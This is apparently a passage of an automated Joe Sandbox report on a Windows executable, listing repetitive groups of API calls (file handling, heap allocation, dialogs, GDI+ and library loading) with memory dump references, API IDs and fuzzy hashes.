                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,003673BC,?,?,?,00000000), ref: 00369DBC
                                                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00369E70
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$BuffersFlushTime
                                                                                        • String ID:
                                                                                        • API String ID: 1392018926-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00369F27,?,?,0036771A), ref: 003696E6
                                                                                        • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00369F27,?,?,0036771A), ref: 00369716
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00369EC7
                                                                                        • GetLastError.KERNEL32 ref: 00369ED4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastPointer
                                                                                        • String ID:
                                                                                        • API String ID: 2976181284-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 00388E75
                                                                                          • Part of subcall function 00388E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00384286,?,0000015D,?,?,?,?,00385762,000000FF,00000000,?,?), ref: 00388E38
                                                                                        • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,003A1098,003617CE,?,?,00000007,?,?,?,003613D6,?,00000000), ref: 00388EB1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocAllocate_free
                                                                                        • String ID:
                                                                                        • API String ID: 2447670028-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(?,?), ref: 003710AB
                                                                                        • GetProcessAffinityMask.KERNEL32(00000000), ref: 003710B2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$AffinityCurrentMask
                                                                                        • String ID:
                                                                                        • API String ID: 1231390398-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0036A325,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A501
                                                                                          • Part of subcall function 0036BB03: _wcslen.LIBCMT ref: 0036BB27
                                                                                        • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0036A325,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A532
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile$_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 2673547680-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • DeleteFileW.KERNELBASE(000000FF,?,?,0036977F,?,?,003695CF,?,?,?,?,?,00392641,000000FF), ref: 0036A1F1
                                                                                          • Part of subcall function 0036BB03: _wcslen.LIBCMT ref: 0036BB27
                                                                                        • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0036977F,?,?,003695CF,?,?,?,?,?,00392641), ref: 0036A21F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: DeleteFile$_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 2643169976-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GdiplusShutdown.GDIPLUS(?,?,?,?,00392641,000000FF), ref: 0037ACB0
                                                                                        • OleUninitialize.OLE32(?,?,?,?,00392641,000000FF), ref: 0037ACB5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: GdiplusShutdownUninitialize
                                                                                        • String ID:
                                                                                        • API String ID: 3856339756-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,0036A23A,?,0036755C,?,?,?,?), ref: 0036A254
                                                                                          • Part of subcall function 0036BB03: _wcslen.LIBCMT ref: 0036BB27
                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0036A23A,?,0036755C,?,?,?,?), ref: 0036A280
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile$_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 2673547680-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _swprintf.LIBCMT ref: 0037DEEC
                                                                                          • Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5
                                                                                        • SetDlgItemTextW.USER32(00000065,?), ref: 0037DF03
                                                                                          • Part of subcall function 0037B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0037B579
                                                                                          • Part of subcall function 0037B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037B58A
                                                                                          • Part of subcall function 0037B568: IsDialogMessageW.USER32(00010420,?), ref: 0037B59E
                                                                                          • Part of subcall function 0037B568: TranslateMessage.USER32(?), ref: 0037B5AC
                                                                                          • Part of subcall function 0037B568: DispatchMessageW.USER32(?), ref: 0037B5B6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 2718869927-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00370836
                                                                                        • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0036F2D8,Crypt32.dll,00000000,0036F35C,?,?,0036F33E,?,?,?), ref: 00370858
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryLibraryLoadSystem
                                                                                        • String ID:
                                                                                        • API String ID: 1175261203-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0037A3DA
                                                                                        • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0037A3E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: BitmapCreateFromGdipStream
                                                                                        • String ID:
                                                                                        • API String ID: 1918208029-0
                                                                                        • Opcode ID: bd0e35063bb2a736f73462d64e868febf5d03cdeecf78452ed734b10205078f8
                                                                                        • Instruction ID: a6c84e2803e519dc82ee7bb83ed93890e2fc68e85bf49e1cb82ec5551a2e9f50
                                                                                        • Opcode Fuzzy Hash: bd0e35063bb2a736f73462d64e868febf5d03cdeecf78452ed734b10205078f8
                                                                                        • Instruction Fuzzy Hash: A8E01275504218EFDB21DF95C541B9DBBF8EF08364F10C05AE89A97201E378AE04DB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00382BAA
                                                                                        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00382BB5
                                                                                        Similarity
                                                                                        • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                        • String ID:
                                                                                        • API String ID: 1660781231-0
                                                                                        • Opcode ID: ac8e0d07045ccb45e858a397e7496c85273d71a94bda3a8985d0ffcc6b6427bf
                                                                                        • Instruction ID: 5c5042bea5b9c8a7e846932b408a099aa63517fe796fb6499062721784d0556b
                                                                                        • Opcode Fuzzy Hash: ac8e0d07045ccb45e858a397e7496c85273d71a94bda3a8985d0ffcc6b6427bf
                                                                                        • Instruction Fuzzy Hash: 7DD02235156300188C1B7EB028039CB3789AD41F70BB146CBF821CD9C1EE218480A312
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: ItemShowWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3351165006-0
                                                                                        • Opcode ID: 18a2b8b2c92308372309e699275f283974084e686cae41f9e679ea77ac319547
                                                                                        • Instruction ID: 642534c231ee3f0fab6cfc6a81c90395f597a8a9220eb5780168e8c42d73efbe
                                                                                        • Opcode Fuzzy Hash: 18a2b8b2c92308372309e699275f283974084e686cae41f9e679ea77ac319547
                                                                                        • Instruction Fuzzy Hash: E6C0127209C200BECB022BB4DC09C2BBBBCEBA5312F08C908B0A5C0060C238C110DB11
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 3519838083-0
                                                                                        • Opcode ID: 1dc9ea1d7ed27714ae86ad3ebf542d76b36c0d2b2e79f978ac3c56833697bf98
                                                                                        • Instruction ID: df4eeaec943d2c50888295dd44a8a6af745ebc6465786adfe31da15cd7fcb09f
                                                                                        • Opcode Fuzzy Hash: 1dc9ea1d7ed27714ae86ad3ebf542d76b36c0d2b2e79f978ac3c56833697bf98
                                                                                        • Instruction Fuzzy Hash: AAC1BF70A002549FEF16CF68C488BBD7BA5AF05310F0D81BAEC469F39ADB719944CB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 3519838083-0
                                                                                        • Opcode ID: d3e6cc49c7246e402de514277918fef99d07c9065b2845cfb4e532bcfbd681f7
                                                                                        • Instruction ID: 852ee0792818c39739f6b608c5cd88da2ab3cf2109ddbce3a56f3cd1cd73d1f1
                                                                                        • Opcode Fuzzy Hash: d3e6cc49c7246e402de514277918fef99d07c9065b2845cfb4e532bcfbd681f7
                                                                                        • Instruction Fuzzy Hash: 5F71D271500F449EDB37DB70C8519E7B7E9AF14301F41892EF2AB8B246DA326A84DF21
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00368289
                                                                                          • Part of subcall function 003613DC: __EH_prolog.LIBCMT ref: 003613E1
                                                                                          • Part of subcall function 0036A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0036A598
                                                                                        Similarity
                                                                                        • API ID: H_prolog$CloseFind
                                                                                        • String ID:
                                                                                        • API String ID: 2506663941-0
                                                                                        • Opcode ID: f60a674df379ed605b402744228b9177c99033c6f27347d82b2844de0f3d94be
                                                                                        • Instruction ID: f44fe1f63c69049e6983b60d91df743f6d167ef8fb38bcc620dca63c61033cd8
                                                                                        • Opcode Fuzzy Hash: f60a674df379ed605b402744228b9177c99033c6f27347d82b2844de0f3d94be
                                                                                        • Instruction Fuzzy Hash: 8D41F9759046589ADB32DB60CC55BEAB3B8AF04304F0485EBE08A9B187EF755FC4CB10
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 003613E1
                                                                                          • Part of subcall function 00365E37: __EH_prolog.LIBCMT ref: 00365E3C
                                                                                          • Part of subcall function 0036CE40: __EH_prolog.LIBCMT ref: 0036CE45
                                                                                          • Part of subcall function 0036B505: __EH_prolog.LIBCMT ref: 0036B50A
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 3519838083-0
                                                                                        • Opcode ID: 3ef48f2cdef3079436f6cfcb961bd896b86c782ba8fdde7118bdbe8c95abeb61
                                                                                        • Instruction ID: 3acfd6a2745849b09fef22d5d01869db45419aff3e366f8a58279248eae3f2db
                                                                                        • Opcode Fuzzy Hash: 3ef48f2cdef3079436f6cfcb961bd896b86c782ba8fdde7118bdbe8c95abeb61
                                                                                        • Instruction Fuzzy Hash: 794148B0905B409EE725CF398885AE6FBE5BF19300F54892ED5EF87282CB316654CB10
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 003613E1
                                                                                          • Part of subcall function 00365E37: __EH_prolog.LIBCMT ref: 00365E3C
                                                                                          • Part of subcall function 0036CE40: __EH_prolog.LIBCMT ref: 0036CE45
                                                                                          • Part of subcall function 0036B505: __EH_prolog.LIBCMT ref: 0036B50A
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 3519838083-0
                                                                                        • Opcode ID: 17831fd5d696c747444baf772eab4ad589b0f5f03abcb64360ff7d07a9cb0a5b
                                                                                        • Instruction ID: b902abae1458b831d1f99f5a919e3fedcf95c50d946535c222eb6fd1b12b20e8
                                                                                        • Opcode Fuzzy Hash: 17831fd5d696c747444baf772eab4ad589b0f5f03abcb64360ff7d07a9cb0a5b
                                                                                        • Instruction Fuzzy Hash: 384167B0905B409EE725CF398885AE6FBE5BF19300F54892ED5FF87282CB326654CB10
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 3519838083-0
                                                                                        • Opcode ID: 5dbcd4a9e7ad51b2cc7776270253be7bb74233040ea968fc1758fa51cd5de0a3
                                                                                        • Instruction ID: 5c3ffb67e4e71fff4907c4c92635e3db2d1f0c760519c60b9522eca0bdc6aa43
                                                                                        • Opcode Fuzzy Hash: 5dbcd4a9e7ad51b2cc7776270253be7bb74233040ea968fc1758fa51cd5de0a3
                                                                                        • Instruction Fuzzy Hash: F321F8B5E40211AFDB259F74CC4165B77A8FB19314F01853EE509EB781D7789A00C7E8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 0037B098
                                                                                          • Part of subcall function 003613DC: __EH_prolog.LIBCMT ref: 003613E1
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 3519838083-0
                                                                                        • Opcode ID: 3e0e7fcfdcd039466d75799f58e918180c42e19ecb658881be38d0a1777eed46
                                                                                        • Instruction ID: 62f1c4d7fb7931f6a0e5ef5785234b0ae3768f064c157b6f9b0bc25664ef7933
                                                                                        • Opcode Fuzzy Hash: 3e0e7fcfdcd039466d75799f58e918180c42e19ecb658881be38d0a1777eed46
                                                                                        • Instruction Fuzzy Hash: F6318F75C04249DFCF26DF64C851AEEBBB4AF09304F54849EE409BB242DB39AE04CB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0038ACF8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc
                                                                                        • String ID:
                                                                                        • API String ID: 190572456-0
                                                                                        • Opcode ID: fd41563d04ced54748e9d8539b38fd257ef8926d7a4ffaeb9c15b698923cd087
                                                                                        • Instruction ID: 068b0710dbe4751864673055225037762e607bc6dcac7a6dd2e94d1522d9cc6c
                                                                                        • Opcode Fuzzy Hash: fd41563d04ced54748e9d8539b38fd257ef8926d7a4ffaeb9c15b698923cd087
                                                                                        • Instruction Fuzzy Hash: CB110A33600B255FBB23EE28DC5095A73ADAB84720B1741A2FD15EB654D731EC0187D2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 3519838083-0
                                                                                        • Opcode ID: 9fc3da6cb256e5abfc21603a5e3828836bf47fe0a5eb15fa20f70794a3a4e2cf
                                                                                        • Instruction ID: 29b4cb72f5695f91d94a7ef1c25683564af1a02222b3be54a1f39fd7af1b1a4c
                                                                                        • Opcode Fuzzy Hash: 9fc3da6cb256e5abfc21603a5e3828836bf47fe0a5eb15fa20f70794a3a4e2cf
                                                                                        • Instruction Fuzzy Hash: 07016537D00528ABCF23ABA8CD91ADEB735AF89750F05C516E816BF256DA348D04C6A0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 0038B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00389813,00000001,00000364,?,003840EF,?,?,003A1098), ref: 0038B177
                                                                                        • _free.LIBCMT ref: 0038C4E5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
